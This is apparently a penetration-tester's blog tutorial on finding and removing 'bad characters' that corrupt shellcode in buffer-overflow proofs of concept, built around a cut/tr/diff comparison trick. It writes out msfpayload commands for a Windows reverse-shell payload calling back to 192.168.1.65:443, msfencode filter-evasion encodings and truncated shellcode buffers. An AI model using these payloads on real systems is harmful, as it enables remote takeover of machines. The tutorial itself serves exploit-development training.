When testing or developing a custom buffer-overflow as a proof of concept, it is often useful to use shellcode to get a command shell.
However, as shellcode payloads are generally binary in nature, they can get corrupted in transit. This is because either the transmission protocol, or the end application can be sensitive to "bad characters" which can break your shellcode in various ways.
(bad characters ;o)
Essentially, many protocols are text based, and non-text characters in the data-stream can either break the transmission (by having a special meaning) or get filtered out.
Shellcode corruption problems
Corruption problems can include, payload truncation, character substitution, missing characters, extra characters, and any combination of the above. Or, even failure of the buffer-overflow condition to work at all, once the shellcode has been introduced to the exploit. It all depends on the shellcode payload, the protocol, application filtering, and the application itself.
So, how can you spot bad characters, and fix the problem, without going through every character in the payload and comparing it to what you received on the other end?
Having done lots of troubleshooting of this situation recently, I thought I would share a solution I found for comparing shellcode, before and after transmission. The payload examples I use are from Metasploit, and I will be looking at the results from Ollydbg, but the concepts are transferable.
Shellcode generation
Metasploit's msfpayload is a great tool for generating payloads.
msfpayload will generate the hexcodes of a defined payload, ready for an exploit-developer to cut and paste directly into their proof of concept exploit
Payloads are generally of the form:
/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.65 LPORT=443 C
/*
* windows/shell_reverse_tcp - 314 bytes
* http://www.metasploit.com
* AutoRunScript=, LHOST=192.168.1.65, EXITFUNC=process,
* InitialAutoRunScript=, LPORT=443, ReverseConnectRetries=5
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02....
Note: that the number of characters per line is variable, and can be around 14 or 15 (not sure why they did this, fixed at 16 would have made more sense to me)
As you may also notice above, there are some \x00 characters in that example, which are often a source of problems, as this character is used as a string terminator in many protocols and applications.
Eliminating bad characters
Badchars can mostly be eliminated by encoding the payload.
In the following example, I output a payload to a file in a raw format, and then encode that file, producing a payload that does not contain the badchar "\x00".
/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.65 LPORT=443 R > reverseshell
/pentest/exploits/framework3/msfencode -i reverseshell -b "\x00"
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
buf =
"\xbb\xf6\xee\x65\x0a\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\x14\x1b\x99" +
"\xe2\x51\xe4\x62\xf3\x01....
(The above two-stage "saving to a file" method is quite useful, as you can quickly produce multiple copies of the same payload in various encoding formats, for testing purposes)
When the encoded payload runs in an exploit, it will unpack itself in memory, recreating the original binary payload, and then run, giving you the command shell.
So, how do you know which characters are badchars?
For most textbased protocols, "\x00", "\x0a" and "\x0d" are a safe bet to be badchars, but there may be many others that will break your shellcode. How can you tell what these are?
During exploit development, you can usually look at the shellcode in memory, when the buffer overflow occurs, perhaps by setting a breakpoint in a debugger, and then compare the shellcode in memory, to what you sent.
This can show you if the shellcode is truncated, or has missing or substituted characters.
Comparison difficulties
However, if you are using Metasploit and OllyDbg,for example, you will end up with a couple of very different formats:
This is the format of the shellcode in your exploit, from Metasploit:
"\xda\xd1\xbb\xfa\x3a\xcd\x45\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x4f\x83\xef\xfc\x31\x5f\x15\x03\x5f\x15\x18\xcf\x31" +
"\xad\x55\x30\xca\x2e\x05\xb8\x2f\x1f\x17\xde\x24\x32\xa7" +
"\x94\x69\xbf\x4c\xf8\x99\x34\x20\xd5\xae\xfd\x8e\x03\x80" +
"\xfe\x3f\x8c\x4e\x3c\x5e\x70\x8d\x11\x80\x49\x5e\x64\xc1" +
"\x8e\x83\x87\x93\x47\xcf\x3a\x03\xe3\x8d\x86\x22\x23\x9a" +
"\xb7\x5c\x46\x5d\x43\xd6\x49\x8e\xfc\x6d\x01\x36\x76\x29" +
"\xb2\x47\x5b\x2a\x8e\x0e\xd0\x98\x64\x91\x30\xd1\x85\xa3" +
"\x7c\xbd\xbb\x0b\x71\xbc\xfc....
This is a cut'n'paste, of the same thing, out of the dump area in OllyDbg:
00C8FDB8 DA D1 BB FA 3A CD 45 D9 74 24 F4 5F 2B C9 B1 4F ÚÑ»ú:ÍEÙt$ô_+ɱO
00C8FDC8 83 EF FC 31 5F 15 03 5F 15 18 CF 31 AD 55 30 CA ?ïü1_ _ Ï1U0Ê
00C8FDD8 2E 05 B8 5C 1F 17 DE 24 32 A7 94 69 BF 4C F8 99 . ¸\ Þ$2§?i¿Lø?
00C8FDE8 34 20 D5 AE FD 8E 03 80 FE 3F 8C 4E 3C 5E 70 8D 4 Õ®ý? ?þ??N<^p
00C8FDF8 11 80 49 5E 64 C1 8E 83 87 93 47 CF 3A 03 E3 8D ?I^dÁ????GÏ: ã
00C8FE08 86 22 23 9A B7 5C 46 5D 43 D6 49 8E FC 6D 01 36 ?"#?·\F]CÖI?üm 6
00C8FE18 76 29 B2 47 5B 2A 8E 0E D0 98 64 91 30 D1 85 A3 v)²G[*? Ð?d?0Ñ?£
00C8FE28 7C BD BB 0B 71 BC FC AC....
You may think, "Ok, I will just look through the payload byte-by-byte, and see what the differences are".
Unless you are a robot, or a savant, you can hardly scan through these quickly and spot the difference.
And whilst you may try the manual process once or twice, it is just not scalable for payloads of 350 to 750 bytes. This is espcially true if you need to do it multiple times, which is often the case in exploit development.
There are several solutions to this. Here is mine...
Use cut, tr, and diff to compare the shellcode
So, what we are going to do here, is put the before and after shellcode in separate files, get them in the same format, and then use the diff command to compare them and see where the differences are.
Diff compares lines, so ideally we want to turn the payloads into files with one character per line, in the same format, so that we can do a...
diff file1.txt file2.txt
... and it will show us the characters which are different.
Here is the commandline kung-fu that I came up with to do this task (you may need to tweak this for your own environment)
Kung-fu
First we have two files; presend.txt and postsent.txt containing the before and after shellcode.
presend.txt is in a Metasploit format. postsend.txt is in a OllyDbg format.
cat presend.txt | tr -d "x",'"',"+","\n"," " | tr "\\" "\n" > preoneperline.txt
cat postsend.txt | cut -d" " -f2-18 | tr -d "\n" | tr "A-F" "a-f" | tr " " "\n" > postoneperline.txt
diff postoneperline.txt preoneperline.txt
This should then point you to the differences between the payloads.
Explaination of the Kung-fu
So, for the Metasploit style format; we remove, the x,",+ and newline characters, and replace every \ with a newline.
For the Debugger format; we chop out the middle section, remove the newlines, make all the hex lowercase, and convert spaces to newlines.
The diff command shows the lines which are different between the files produced. As we now have one character on each line, this will be is a character by character comparison and analysis.
The remedy
Once you have found all the badchars, you can then remove them. For example:
/pentest/exploits/framework3/msfencode -i reverseshell -b "\x00\x0a\x0d\x2f"
Encoding as (almost all) text
The following example is a catch-all, that will work around most situations, but it will make the payload rather large (around 700 bytes for a 350 byte payload)
/pentest/exploits/framework3/msfencode -i reverseshell -e x86/alpha_mixed
[*] x86/alpha_mixed succeeded with size 690 (iteration=1)
buf =
"\x89\xe7\xda\xd6\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x4b\x4c\x49\x78\x4c\x49\x47\x70\x47\x70" +
"\x43\x30\x45\x30\x4c\x49\x4d\x35\x54\x71\x4b\x62\x50\x64" +
"\x4e\x6b\x52\x72\x54\x70\x4c\x4b\x56\x32\x54\x4c\x4c\x4b" +
"\x50\x52\x47\x64\x4c\x4b\x50\x72\x54\x68\x56\x6f\x4d\x67" +
"\x51\x5a\x56\x46\x54\x71\x49...
There is one issue here, and that is the few characters that are not alpha numeric at the begining "\xe7\xda\xd6\xd9" and "\xf4" which are rather unfortunate for this payload.
There are further ways to avoid these, but a more complex issue, perhaps for another time...